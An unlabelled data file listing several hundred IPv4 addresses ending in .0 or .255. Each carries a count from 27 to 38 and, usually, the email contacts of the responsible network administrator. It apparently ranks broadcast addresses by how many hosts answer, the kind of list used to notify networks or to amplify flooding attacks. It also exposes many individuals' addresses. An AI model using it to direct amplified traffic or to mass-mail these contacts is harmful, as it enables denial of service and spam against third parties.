38 204.116.226.0
38 204.116.226.255
38 204.116.33.0 richard.colgate@sunbelt.net
38 204.116.33.255 richard.colgate@sunbelt.net
38 206.126.151.255 pete@altadena.net
38 208.218.96.0 mitch@gvtc.com
38 208.218.97.0 mitch@gvtc.com
38 208.218.96.255 mitch@gvtc.com
38 207.177.41.0 noc@netins.net
38 207.177.41.255 noc@netins.net
38 209.85.102.0 hostmaster@softaware.com
38 209.85.103.255 jweis@softaware.com
38 207.67.228.255 Dave@pacificcolor.com
38 207.196.111.0 hostmaster@clark.net
38 207.224.201.0 dlongar@uswest.net
38 209.64.2.0 info@netradio.net
38 206.206.103.255 Beeson@technet.nm.org
38 209.175.161.255 wdahlen@mail.isbe.state.il.us
38 206.176.39.0 sbrost@mystic.bhsu.edu
38 206.176.39.255 sbrost@mystic.bhsu.edu
38 206.191.216.255 nomailbox@nowhere
37 193.128.20.255
37 193.188.61.255 kha@knpc.com.kw, hmb@knpc.com.kw
37 195.20.88.0 103023.2047@compuserve.com,
hostmaster@OMNILINK.NET
37 195.20.88.255 hostmaster@omnilink.net,
103023.2047@compuserve.com
37 195.38.102.255 thomas@tvnet.hu, adi@tvnet.hu
37 199.244.182.255
37 203.238.129.255 mgr@nownuri.net, ip@nownuri.net
37 204.254.80.255 keith@dcna.com
37 204.48.142.255 tuma@ceo.sbceo.k12.ca.us
37 204.48.223.0 tuma@ceo.sbceo.k12.ca.us
37 204.69.110.255 wong@accesscom.net
37 205.223.148.255 dale@roadrunner.admin.leon.k12.fl.us
37 207.123.253.255 mullauer@umms-itg.ab.umd.edu
37 207.67.228.0 Dave@pacificcolor.com
37 206.191.225.0 hostmaster@spacestar.net
37 216.101.17.0 cpuccetti@advmedicine.com
37 207.214.141.255 kgibbs@porterville.k12.ca.us
37 209.163.146.0
37 206.206.103.0 Beeson@technet.nm.org
37 208.237.105.255 rwilhe@luk-us.com
37 210.84.0.0 net-ops@list.ozemail.com.au
37 209.3.41.0 noc@iconnet.net
37 209.201.116.0 support@iconnet.net
37 209.3.40.255 noc@iconnet.net
37 209.201.116.255 support@iconnet.net
37 209.201.119.255 support@iconnet.net
37 216.168.235.0 cwei@netsol.com
37 216.168.235.255 cwei@netsol.com
37 209.144.168.255 ggillespie@currents.net
37 216.12.37.255 dns@cfw.com
37 209.149.248.0 ipadmin@bellsouth.net
37 209.240.85.0 mury@goldengate.net
37 209.240.85.255 mury@goldengate.net
37 208.2.250.255 nomailbox@nowhere
36 193.0.84.0 Marcin.Gromisz@fuw.edu.pl,
Michal.Jankowski@fuw.edu.pl
36 194.68.198.0
36 199.105.221.0 dns@cerf.net
36 199.178.74.0 hostmaster@ameritech.net
36 202.99.41.0
36 202.99.48.0
36 202.99.48.255
36 204.181.85.255 jbuchle@staktek.com
36 204.211.80.0 hostmaster@sips.state.nc.us
36 204.228.78.255 cgarner@sni.net
36 204.69.110.0 wong@accesscom.net
36 205.138.50.0 ipswip@cw.net
36 205.138.50.255 ipswip@cw.net
36 205.213.134.255 frcr@ltc.tec.wi.us
36 205.213.135.255 frcr@ltc.tec.wi.us
36 205.253.192.0 karl@mcs.com
36 205.253.192.255 karl@mcs.com
36 212.48.2.255 carlo.gualandri@matrix.it, melli@matrix.it
36 207.13.165.255 NOC@sprint.net
36 207.214.141.0 kgibbs@porterville.k12.ca.us
36 210.208.167.0 tonyyuan@mail.my.net.tw
36 216.88.175.0 scotts@blairlake.com
36 210.208.167.255 tonyyuan@mail.my.net.tw
36 210.78.152.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 210.78.153.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 210.78.158.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 210.78.152.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 210.78.153.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 210.78.154.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 210.78.155.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 210.78.158.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
36 216.94.82.255 nhermes@adexpress.ca
36 207.66.244.0 pat@wolfe.net
36 209.201.118.0 support@iconnet.net
36 209.201.118.255 support@iconnet.net
36 207.13.164.255 NOC@sprint.net
36 209.149.248.255 ipadmin@bellsouth.net
36 209.152.141.255 domain@slip.net
35 192.160.217.255 greenup@whittier.edu
35 192.174.35.0
35 192.204.204.0 jacobs@mail.dp.upenn.edu
35 192.204.204.255 jacobs@mail.dp.upenn.edu
35 194.57.84.0 Patrice.Koch@univ-fcomte.fr
35 195.90.31.255 guardian@isb.net, nerge@isb.net
35 199.186.145.255 hostmaster@attmail.com
35 200.17.53.255 gomide@nic.br
35 200.25.18.0 lcgomez@b-manga.cetcol.net.co
35 204.0.135.255 hostmaster@sesqui.net
35 204.254.150.0 postmaster@arn.net
35 204.254.150.255 postmaster@arn.net
35 204.48.142.0 tuma@ceo.sbceo.k12.ca.us
35 204.48.223.255 tuma@ceo.sbceo.k12.ca.us
35 205.164.166.0 mjg@writeme.com
35 205.213.128.0 frcr@ltc.tec.wi.us
35 205.213.132.0 frcr@ltc.tec.wi.us
35 205.213.135.0 frcr@ltc.tec.wi.us
35 206.0.199.255 hostinfo@psi.com
35 207.163.229.255 hostmaster@alameda-coe.k12.ca.us
35 207.13.164.0 NOC@sprint.net
35 207.214.142.255 kgibbs@porterville.k12.ca.us
35 207.123.250.255 mullauer@umms-itg.ab.umd.edu
35 207.25.98.0 noc@ans.net
35 207.10.165.0 rcm@mmc.marymt.edu
35 210.208.166.0 tonyyuan@mail.my.net.tw
35 207.10.165.255 rcm@mmc.marymt.edu
35 210.78.154.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
35 210.78.155.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
35 210.78.159.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
whzhang@cnnic.cn, dl@cnnic.net.cn
35 207.136.233.0 topher@madriver.com
35 206.247.11.255 rkd@rmi.net
35 216.214.168.255 noc@megsinet.net
35 216.64.150.255 hostmaster@gsti.net
35 216.84.9.0 netadmin@southernet.net
35 209.85.170.0 hostmaster@softaware.com
35 209.85.170.255 hostmaster@softaware.com
35 207.13.165.0 NOC@sprint.net
35 209.163.147.255 alan@waldenweb.com
35 209.39.59.0 netadmin@onramp.net
34 24.217.1.255 mczakaria@chartercom.com
34 152.3.144.255 rdc@netcom.duke.edu
34 192.173.9.0 gandrews@drc.com
34 193.252.125.255 postmaster@wanadoo.fr, abuse@wanadoo.fr,
Sylvain.Causse@wanadoo.com
34 195.202.143.0 herbert.voegl@kabsi.at, chris@streams.at,
christian.steger@indis.at
34 195.90.31.0 guardian@isb.net, nerge@isb.net
34 198.188.181.0 nes@4c.net
34 199.119.8.255 http://103536.3617@compuserve.com
34 202.78.157.0 ken@clearview.co.nz, bobg@clearview.co.nz
34 203.155.160.0 chatree@ram1.ru.ac.th, admin@ns.ksc.co.th
34 203.95.7.255 zao@stn.sh.cn, sqian@fudan.edu.cn
34 205.152.12.255 ipadmin@bellsouth.net
34 205.169.211.0 postmaster@garfield.k12.co.us
34 205.213.132.255 frcr@ltc.tec.wi.us
34 205.216.169.0 sei@vidpbx.com
34 205.216.169.255 sei@vidpbx.com
34 209.63.149.255 cbrown@advanced-power.com
34 207.163.229.0 hostmaster@alameda-coe.k12.ca.us
34 212.48.2.0 carlo.gualandri@matrix.it, melli@matrix.it
34 208.154.15.255 ron@syrworldnet.com
34 207.149.39.255 brett@pond.net
34 208.154.15.0 ron@syrworldnet.com
34 207.214.142.0 kgibbs@porterville.k12.ca.us
34 207.100.159.0 hostmaster@icix.net
34 216.214.168.0 noc@megsinet.net
34 209.3.130.255 wkrug@atlnet.org
34 209.132.105.0 garyq@wpds.com
34 209.167.171.255 chris@tntech.com
34 209.152.182.255 domain@slip.net
34 209.144.168.0 ggillespie@currents.net
34 208.225.130.255 lbutrick@awr.com
34 209.135.222.255 mromm@kivex.com
33 24.66.63.0 internet.abuse@shaw.ca
33 152.3.144.0 rdc@netcom.duke.edu
33 198.97.78.0 postmaster@algo.net
33 199.103.248.0 dnsmaster@terra.net
33 202.102.30.0 dmkou@publicf.bta.net.cn,
pearl.m@public1.ptt.js.cn
33 202.102.30.255 dmkou@publicf.bta.net.cn,
pearl.m@public1.ptt.js.cn
33 203.127.167.0
33 203.127.167.255
33 204.130.67.255
33 204.152.57.255 allen.arthur@oak.doe.gov
33 204.186.98.255 dns-request@ptd.net
33 204.192.47.0 noc@digex.net
33 204.32.135.0 Louis_Lee@icgcomm.com
33 204.32.135.255 Louis_Lee@icgcomm.com
33 205.165.50.0 RIDDLE@twu.edu
33 205.165.50.255 RIDDLE@twu.edu
33 205.230.191.0 bob@new-york.net
33 206.0.199.0 hostinfo@psi.com
33 206.141.16.255 lak@aads.net
33 206.148.48.255 Wong@callaway.com
33 207.149.39.0 brett@pond.net
33 210.17.1.0 dengwei@access.ttn.com.tw
33 216.103.204.0 ip-admin@pbi.net
33 209.233.209.0 ip-admin@pbi.net
33 209.80.138.0 tom_plati@wellesley.mec.edu
33 207.100.159.255 hostmaster@icix.net
33 216.103.205.255 ip-admin@pbi.net
33 209.149.4.0 ipadmin@bellsouth.net
33 207.109.43.0 dns-info@uswest.net
33 207.16.219.255 help@uunet.uu.net
33 209.201.119.0 support@iconnet.net
33 209.47.228.0 chris@tntech.com
33 216.88.175.255 scotts@blairlake.com
33 207.96.71.0 domreg@erols.com
33 208.158.116.0 nomailbox@nowhere
32 63.65.8.255 twright@cathedral.org
32 140.237.20.0 lauer@merl.com
32 140.237.20.255 lauer@merl.com
32 192.211.32.255 sawise@mindspring.com, wise@widedata.com
32 194.229.106.0
32 194.78.210.0 jfs@skynet.be
32 194.78.210.255 jfs@skynet.be
32 194.78.211.0 jfs@skynet.be
32 194.78.211.255 jfs@skynet.be
32 195.232.126.0 hostmaster@wcom.net
32 198.142.200.255 matt@mpx.com.au
32 198.6.49.0 aperry@symantec.com
32 198.6.49.255 aperry@symantec.com
32 199.186.145.0 hostmaster@attmail.com
32 199.98.170.255 hostinfo@psi.com
32 200.132.7.255 gomide@nic.br
32 203.155.175.255 chatree@ram1.ru.ac.th, admin@ns.ksc.co.th
32 204.130.67.0
32 204.130.69.0
32 204.220.140.0 hostmaster@computerpro.com
32 204.220.140.255 hostmaster@computerpro.com
32 204.220.141.0 hostmaster@computerpro.com
32 204.220.141.255 hostmaster@computerpro.com
32 204.220.142.0 nomailbox@nowhere
32 204.220.142.255 nomailbox@nowhere
32 205.211.53.255 teha@algonquinc.on.ca
32 206.17.97.0 dns@cerf.net
32 209.63.148.255 cbrown@advanced-power.com
32 207.246.134.0 edmond@flyingcroc.com
32 207.246.143.0 webmaster@redchicken.com
32 207.246.134.255 edmond@flyingcroc.com
32 207.246.143.255 webmaster@redchicken.com
32 216.101.17.255 cpuccetti@advmedicine.com
32 209.32.51.0 nomailbox@nowhere
32 207.224.249.0 dlongar@uswest.net
32 209.32.51.255 nomailbox@nowhere
32 210.208.166.255 tonyyuan@mail.my.net.tw
32 207.196.81.0 hostmaster@clark.net
32 207.17.200.0 avnet@radicalmedia.com
32 209.135.192.0
32 207.66.244.255 pat@wolfe.net
32 206.74.159.0 mckee@admin.infoave.net
32 206.74.159.255 mckee@admin.infoave.net
32 209.79.52.0 marc@service.com
32 206.215.195.0 jdecryberry@cupnb.com
32 209.47.228.255 chris@tntech.com
32 209.7.241.0 djurewic@lth3.k12.il.us
32 208.13.18.255 nomailbox@nowhere
32 206.23.197.255 jwinters@tec.net
31 152.3.228.0 rdc@netcom.duke.edu
31 152.3.228.255 rdc@netcom.duke.edu
31 192.160.217.0 greenup@whittier.edu
31 193.188.61.0 kha@knpc.com.kw, hmb@knpc.com.kw
31 194.167.45.0 bdulmet@ens2m.fr
31 194.209.156.0 hostmaster@screenlight.ch
31 194.209.156.255 hostmaster@screenlight.ch
31 194.252.70.0 jarmo.miettinen@sonera.fi, matti.aarnio@tele.fi
31 194.68.198.255
31 199.111.79.0 jaj@virginia.edu
31 202.101.127.0
31 202.102.13.0 dmkou@publicf.bta.net.cn,
pearl.m@public1.ptt.js.cn
31 202.102.32.0 dmkou@publicf.bta.net.cn,
pearl.m@public1.ptt.js.cn
31 202.102.32.255 dmkou@publicf.bta.net.cn,
pearl.m@public1.ptt.js.cn
31 202.247.6.0 hostmaster@nic.ad.jp
31 203.180.182.0 hostmaster@nic.ad.jp
31 203.180.182.255 hostmaster@nic.ad.jp
31 203.182.48.0 hostmaster@nic.ad.jp
31 203.238.131.0 mgr@nownuri.net, ip@nownuri.net
31 204.32.80.255 bille@petersons.com
31 205.185.160.0 Louis_Lee@icgcomm.com
31 205.231.58.255 help@uunet.uu.net
31 205.232.18.255 denz@ria.org
31 206.163.24.255 spencer@bendnet.com
31 207.137.159.255 netops@4d.net
31 206.23.197.0 jwinters@tec.net
31 210.145.24.0 hostmaster@nic.ad.jp
31 210.17.1.255 dengwei@access.ttn.com.tw
31 216.50.134.0 technical@kivex.com
31 208.241.46.255 slokuge@2launch.com
31 208.168.246.255 kenwhit@remc8.k12.mi.us
31 209.133.94.255 noc@above.net
31 216.111.166.255 noc@qwest.net
31 206.64.4.0 jba@genx.net
31 208.196.34.255 jimj@rp-l.com
31 206.23.195.255 jwinters@tec.net
31 212.86.0.0 Teemu.Anttila@verkkotieto.com
31 208.212.74.0 espencer@globix.com
31 212.86.0.255 Teemu.Anttila@verkkotieto.com
31 208.212.74.255 espencer@globix.com
31 208.10.133.0 nomailbox@nowhere
31 216.168.160.255 talal@vipcalling.com
31 216.168.160.0 talal@vipcalling.com
31 207.215.238.255 jaykata@ltsc.org
31 216.168.161.0 talal@vipcalling.com
31 209.3.40.0 noc@iconnet.net
31 209.39.24.255 netadmin@onramp.net
31 209.10.126.0 hostmaster@globix.net
31 207.244.119.255 nitromed@shore.net
31 208.29.189.0 nomailbox@nowhere
31 208.168.231.0 bjoyce@remc8.k12.mi.us
31 208.168.231.255 bjoyce@remc8.k12.mi.us
30 63.64.128.255 info@schwablearning.org
30 166.45.5.0 hostmaster@mci.net
30 166.45.5.255 hostmaster@mci.net
30 192.174.35.255
30 193.120.12.0 noc@esat.net
30 193.120.12.255 noc@esat.net
30 193.170.126.0 m.mauerkirchner@mail.htl-leonding.ac.at,
m.mauerkirchner@mail.asn-linz.ac.at,
Karoly.Erdei@risc.uni-linz.ac.at,
Karoly.Erdei@risc.uni-linz.ac.at
30 193.67.180.0 joppe.van.der.reijden@veronica.nl,
luuk@veronica.nl
30 194.93.134.255 mcarr@intensive.net, j.baker@intensive.net
30 195.141.0.0 robert.jones@sunrise.ch, peter.zopfi@sunrise.ch,
stefan.thoma@sunrise.ch
30 195.232.126.255 hostmaster@wcom.net
30 198.112.56.255 mikem@cw.com
30 198.243.153.0 dtorbet@jonesinternet.com
30 198.25.218.0 JWELLS@gi-link.dcrb.dla.mil
30 198.76.85.0 dmcginni@ndu.edu
30 198.76.85.255 dmcginni@ndu.edu
30 199.111.105.0 jaj@virginia.edu
30 199.111.105.255 jaj@virginia.edu
30 199.182.135.0 hostmaster@maxstrat.com
30 199.183.164.0 Louis_Lee@icgcomm.com
30 199.249.19.255 paul.weber@mci.com
30 199.72.94.0 hostmaster@interpath.net
30 199.72.95.0 hostmaster@interpath.net
30 199.72.95.255 hostmaster@interpath.net
30 202.102.13.255 dmkou@publicf.bta.net.cn,
pearl.m@public1.ptt.js.cn
30 202.232.119.0 hostmaster@nic.ad.jp
30 202.36.35.0
30 203.110.2.0 philip@voyager.co.nz, mat@voyager.co.nz
30 203.110.2.255 philip@voyager.co.nz, mat@voyager.co.nz
30 203.238.131.255 mgr@nownuri.net, ip@nownuri.net
30 203.98.1.0 philip@voyager.co.nz, aitken@fruean.com
30 203.98.38.0 dsharples@oibunzl2.telstra.com.au
30 204.168.184.255 bill.russell@nyu.edu
30 204.178.107.255 danny@akamai.com
30 204.178.110.0 danny@akamai.com
30 204.178.110.255 aperry@symantec.com
30 204.32.80.0 bille@petersons.com
30 205.232.18.0 denz@ria.org
30 206.23.195.0 jwinters@tec.net
30 209.49.144.255 jamie@itribe.net
30 207.86.190.255 dns@digex.net
30 206.205.105.0 noc@digex.net
30 216.168.242.0 cwei@netsol.com
30 216.168.242.255 cwei@netsol.com
30 210.236.10.255 hostmaster@nic.ad.jp
30 209.220.50.255 hostmaster@concentric.net
30 208.167.146.255 lpowers@eastky.net
30 208.227.145.0 spell@wilmington.net
30 216.50.134.255 technical@kivex.com
30 208.227.144.255 spell@wilmington.net
30 206.6.19.0 hostinfo@psi.com
30 209.220.50.0 hostmaster@concentric.net
30 209.140.163.0 darin@good.net
30 209.140.163.255 darin@good.net
30 207.245.26.255 NOCToronto@metronet.ca
30 208.217.4.0 norrg001@gold.tc.umn.edu
30 207.110.28.0 kit@connectnet.com
30 209.76.0.0 aleph1@dfw.net
30 209.76.1.0
30 209.76.2.0 aleph1@dfw.net
30 208.228.215.0 jsutherlin@pacificcolor.com
30 208.228.215.255 jsutherlin@pacificcolor.com
30 209.226.73.0 noc@in.bell.ca
30 209.226.73.255 noc@in.bell.ca
30 207.96.117.0 domreg@erols.com
30 207.96.117.255 domreg@erols.com
30 207.212.182.255 ip-admin@pbi.net
30 208.157.105.255 ipadmin@desupernet.net
30 209.79.52.255 marc@service.com
30 206.225.61.255 kenneth@jump.net
30 208.201.184.255 nomailbox@nowhere
30 208.2.250.0 nomailbox@nowhere
29 143.213.220.0 MILLARDD@shafter-emh3.army.mil
29 143.213.251.0 MILLARDD@shafter-emh3.army.mil
29 161.223.163.0
29 167.199.168.0 jda51@state.ga.us
29 168.234.39.0 mmorales@concyt.gob.gt
29 192.190.131.255 Annie.Renard@inria.fr
29 193.0.80.0 Marcin.Gromisz@fuw.edu.pl,
Michal.Jankowski@fuw.edu.pl
29 193.188.81.0
29 193.188.81.255
29 193.52.99.0 tchou@narech.dnet.circe.fr,
jacky.gabriel@sciences.univ-nantes.fr,
jacky.gabriel@sciences.univ-nantes.fr
29 193.52.99.255 tchou@narech.dnet.circe.fr,
jacky.gabriel@sciences.univ-nantes.fr,
jacky.gabriel@sciences.univ-nantes.fr
29 194.151.42.255 beheer@a1.nl
29 194.205.160.0 support@insnet.net
29 194.207.107.255 andy@openworld.co.uk
29 194.79.131.255 support@internext.fr, sam@internext.fr
29 194.79.163.0 lgadot@nbo.fr
29 194.79.163.255 lgadot@nbo.fr
29 194.79.164.0 support@internext.fr, sam@internext.fr
29 194.79.164.255 support@internext.fr, sam@internext.fr
29 199.182.135.255 hostmaster@maxstrat.com
29 199.183.165.255 Louis_Lee@icgcomm.com
29 199.72.140.255 hostmaster@interpath.net
29 200.16.176.255 nomailbox@nowhere
29 200.30.32.0 nomailbox@nowhere
29 200.30.32.255 nomailbox@nowhere
29 202.167.35.0 paul.brooks@globalone.net
29 202.167.35.255 paul.brooks@globalone.net
29 202.36.35.255
29 203.21.29.255 hostmaster@telstra.net
29 204.101.194.0 debbie@worldlinx.com
29 204.101.194.255 debbie@worldlinx.com
29 204.152.145.0 netmaster@organic.com
29 204.152.145.255 netmaster@organic.com
29 204.178.38.0 smith@icarus.usanetworks.com
29 204.178.38.255 smith@icarus.usanetworks.com
29 204.28.66.255 mi00101@mi00040.monroe.k12.la.us
29 204.71.144.0 ipadmin@cw.net
29 204.71.144.255 ipadmin@cw.net
29 205.143.124.255 rtesta@gia.org
29 205.152.39.255 ipadmin@bellsouth.net
29 205.169.153.255 ckimball@mapquest.com
29 205.174.194.0 dharringt@deq.state.va.us
29 205.205.132.0 dgiroux@cenosis.com
29 205.211.37.0 teha@algonquinc.on.ca
29 205.211.53.0 teha@algonquinc.on.ca
29 205.232.52.255 rcm@mmc.marymt.edu
29 205.243.207.0 ryan@inc.net
29 216.111.167.255 noc@qwest.net
29 206.20.225.0 noc@corp.idt.net
29 206.196.103.255 steve@inlink.com
29 208.203.140.0 asbad@camalott.com
29 209.38.216.0 dnsadmin@rmi.net
29 208.166.84.255 jgagne@monad.net
29 208.203.140.255 asbad@camalott.com
29 209.38.216.255 dnsadmin@rmi.net
29 207.22.96.0 hostmaster@clark.net
29 208.234.147.0 nomailbox@nowhere
29 208.157.126.0 rodneyl@ctlnet.com
29 207.66.209.255 pat@wolfe.net
29 208.130.144.0 nomailbox@nowhere
29 216.20.20.255 jcoco@mec.edu
29 212.208.226.0 hahn@rmcnet.fr, olemarie@fr.uu.net
29 207.215.238.0 jaykata@ltsc.org
29 207.213.16.0 nomailbox@nowhere
29 207.213.16.255 nomailbox@nowhere
29 209.187.17.0 dns@cerf.net
29 207.156.130.0 mpr@li.net
29 209.3.41.255 noc@iconnet.net
29 208.130.144.255 nomailbox@nowhere
29 208.150.32.0 noc@megsinet.net
29 208.157.105.0 ipadmin@desupernet.net
29 209.132.109.255 garyq@wpds.com
29 207.97.140.0 sbriggs@i-2000.com
29 207.97.140.255 sbriggs@i-2000.com
29 207.240.141.255 hostmaster@inch.com
29 207.21.119.0 hostmaster@ncal.verio.net
29 209.7.241.255 djurewic@lth3.k12.il.us
29 208.215.55.0 bo@quicklink.com
29 209.0.254.0 ipadmin@level3.net
29 209.0.254.255 ipadmin@level3.net
29 209.63.26.255 bradw@tlg.com
28 167.199.169.255 jda51@state.ga.us
28 193.188.63.255 kha@knpc.com.kw, hmb@knpc.com.kw
28 193.74.176.0 mdevos@argo.be,
Francois.Wouters@gemeenschapsonderwijs.be
28 194.133.98.0 loison@artinternet.fr, gaiffe@ordipat.fr
28 194.151.42.0 beheer@a1.nl
28 195.202.146.0 herbert.voegl@kabsi.at, chris@streams.at,
christian.steger@indis.at
28 199.178.74.255 hostmaster@ameritech.net
28 199.98.104.0 hostinfo@psi.com
28 199.98.104.255 hostinfo@psi.com
28 200.16.177.0 nomailbox@nowhere
28 202.214.252.255 hostmaster@nic.ad.jp
28 202.219.144.0 technical@apnic.net
28 202.238.79.0 hostmaster@nic.ad.jp
28 202.238.79.255 hostmaster@nic.ad.jp
28 204.186.98.0 dns-request@ptd.net
28 204.233.237.0 tcampbell@verio.net
28 204.233.237.255 tcampbell@verio.net
28 204.242.237.255 hostinfo@psi.com
28 204.28.66.0 mi00101@mi00040.monroe.k12.la.us
28 204.97.21.255 stewartw@fpc.edu
28 204.97.74.0 nomailbox@nowhere
28 204.97.74.255 nomailbox@nowhere
28 205.139.127.255 kerrigan@syrlang.com
28 205.169.153.0 ckimball@mapquest.com
28 205.216.184.0 daniel@wolfgroup.com
28 206.112. dave@ntr.net
28 206.112.14.255 jchurch@ntr.net
28 206.169.28.0 hostmaster@hooked.net
28 207.132.232.255 HOSTMASTER@nic.mil
28 207.25.98.255 noc@ans.net
28 207.245.225.0 andre@storm.ca
28 207.245.225.255 andre@storm.ca
28 208.133.75.0 noc@megsinet.net
28 208.133.76.0 noc@megsinet.net
28 208.133.87.0 noc@megsinet.net
28 210.161.135.0 hostmaster@nic.ad.jp
28 207.95.245.0 Louis_Lee@icgcomm.com
28 208.133.75.255 noc@megsinet.net
28 208.133.76.255 noc@megsinet.net
28 208.133.87.255 noc@megsinet.net
28 210.161.135.255 hostmaster@nic.ad.jp
28 207.95.245.255 Louis_Lee@icgcomm.com
28 208.207.33.0 noc@bigplanet.net
28 208.166.84.0
28 207.96.63.255 domreg@erols.com
28 206.97.4.0 william.winkel@spencergifts.com
28 216.96.23.0 randy@greatplainsmfg.com
28 207.245.26.0 NOCToronto@metronet.ca
28 209.47.235.0 pamela@ebean.com
28 209.47.235.255 pamela@ebean.com
28 216.161.32.0 dns-info@uswest.net
28 216.161.32.255 dns-info@uswest.net
28 207.208.90.0 hostmaster@interaccess.com
28 207.208.93.0 hostmaster@interaccess.com
28 216.101.120.0 ip-admin@pbi.net
28 216.101.123.255 ip-admin@pbi.net
28 206.247.216.255 dnsadmin@rmi.net
28 212.208.227.255 hahn@rmcnet.fr, olemarie@fr.uu.net
28 216.20.20.0 jcoco@mec.edu
28 208.244.213.255 pforbes@opcode.com
28 209.81.187.255 noc@megsinet.net
28 209.81.189.255 noc@megsinet.net
28 209.167.146.0 itelford@scaleable.com
28 209.81.187.0 noc@megsinet.net
28 209.132.109.0 garyq@wpds.com
28 216.161.33.0 dns-info@uswest.net
28 216.161.33.255 dns-info@uswest.net
28 209.8.0.0 domreg@cais.net
28 209.70.110.255 hostmaster@clark.net
28 208.142.122.0 hostmaster@mci.net
28 210.139.3.255 hostmaster@nic.ad.jp
28 208.142.122.255 hostmaster@mci.net
27 143.43.248.0 D-Romano@wiu.edu
27 167.67.195.255 grant.jensen@emd-tech.com
27 168.234.36.0 mmorales@concyt.gob.gt
27 192.70.104.0 Annie.Renard@inria.fr
27 193.158.2.0 tgoetz@cube.net, Horn@eins-und-eins.de
27 193.188.51.255 kha@knpc.com.kw, hmb@knpc.com.kw
27 193.252.125.0 postmaster@wanadoo.fr, abuse@wanadoo.fr,
Sylvain.Causse@wanadoo.com
27 193.54.52.255 Denis.Pays@univ-bpclermont.fr,
Claude.Gendraud@univ-bpclermont.fr
27 193.74.176.255 mdevos@argo.be,
Francois.Wouters@gemeenschapsonderwijs.be
27 193.74.177.0 mdevos@argo.be,
Francois.Wouters@gemeenschapsonderwijs.be
27 194.133.98.255 loison@artinternet.fr, gaiffe@ordipat.fr
27 194.96.123.0 libischer@via.at
27 194.96.123.255 libischer@via.at
27 195.180.58.255 kai.bessler@windi.de, joswig@lavielle.com
27 195.246.135.255 loison@artinternet.fr, lbernard@artinternet.fr
27 195.70.147.0 pavel@terminal.cz
27 198.112.56.0 mikem@cw.com
27 198.139.127.0 pradeep@stpb.soft.net
27 198.163.232.0 tech@escape.ca
27 198.163.232.255 tech@escape.ca
27 198.163.240.0 gordt@macrodyne.net
27 198.163.240.255 gordt@macrodyne.net
27 198.163.241.0 gordt@macrodyne.net
27 198.163.241.255 gordt@macrodyne.net
27 199.172.111.0 staylor@pen.ci.santa-monica.ca.us
27 199.172.111.255 staylor@pen.ci.santa-monica.ca.us
27 199.172.97.0 staylor@pen.ci.santa-monica.ca.us
27 199.172.97.255 staylor@pen.ci.santa-monica.ca.us
27 199.176.109.0 michael_jones@chi.leoburnett.com
27 199.234.16.0
27 199.73.39.255 hostmaster@clark.net
27 199.98.103.0 hostinfo@psi.com
27 199.98.103.255 hostinfo@psi.com
27 200.38.61.0 racuna@mpsnet.com.mx
27 200.38.61.255 racuna@mpsnet.com.mx
27 202.190.19.0
27 202.219.0.255 technical@apnic.net
27 203.116.195.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg
27 203.116.195.255 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg
27 203.116.81.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg
27 203.116.95.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg
27 203.126.200.255 hostmaster@singnet.com.sg
27 203.126.201.255 hostmaster@singnet.com.sg
27 203.127.27.0 meng@mediacity.com.sg, hostmaster@singnet.com.sg
27 203.127.27.255 meng@mediacity.com.sg, hostmaster@singnet.com.sg
27 203.179.212.0 hostmaster@nic.ad.jp
27 203.21.24.0 hostmaster@telstra.net
27 203.69.23.0
27 203.69.23.255
27 204.112.144.0 rstokes@infobahn.mb.ca
27 204.112.144.255 rstokes@infobahn.mb.ca
27 204.112.20.0 emarshal@logic.net
27 204.112.20.255 emarshal@logic.net
27 204.112.6.0 REMILLARD@solutions.net
27 204.112.6.255 REMILLARD@solutions.net
27 204.215.190.0 timj@tiac.net
27 204.242.237.0 hostinfo@psi.com
27 204.30.45.0 herbert.kwok@jwtworks.com
27 204.30.45.255 herbert.kwok@jwtworks.com
27 204.34.17.255
27 204.48.169.0 tuma@ceo.sbceo.k12.ca.us
27 204.48.169.255 tuma@ceo.sbceo.k12.ca.us
27 204.60.81.0 cmiller@snet.net
27 205.152.40.0 ipadmin@bellsouth.net
27 205.160.84.0 NOC@sprint.net
27 205.171.33.0 hostmaster@csn.net
27 205.227.63.255 lgoodman@iacnet.com
27 206.15.182.0 wink@ziplink.net
27 206.151.238.0 baltar@sy.com
27 207.100.46.255 hostmaster@icix.net
27 207.223.132.255 Louis_Lee@icgcomm.com
27 207.223.132.0 Louis_Lee@icgcomm.com
27 209.126.50.0 domreg@qni.com
27 209.147.16.0 art@lacoe.edu
27 209.147.24.0 art@lacoe.edu
27 207.99.200.0 art@lacoe.edu
27 209.147.14.255 art@lacoe.edu
27 209.147.15.255 art@lacoe.edu
27 207.233.136.0 noc@diginetusa.net
27 207.161.177.0 marc@escape.ca
27 207.233.136.255 noc@diginetusa.net
27 207.161.177.255 marc@escape.ca
27 208.240.37.0 kuba.tatarkiwicz@themedco.com
27 208.0.177.0 hostmaster@top.monad.net
27 216.96.23.255 randy@greatplainsmfg.com
27 208.0.177.255 hostmaster@top.monad.net
27 208.198.61.255 noc@atlantech.net
27 207.86.227.255 dns@digex.net
27 209.227.70.255 eric@mxol.com
27 207.208.93.255 hostmaster@interaccess.com
27 207.156.131.0 mpr@li.net
27 209.3.104.255 support@iconnet.net
27 210.150.28.255 hostmaster@nic.ad.jp
27 208.150.32.255 noc@megsinet.net
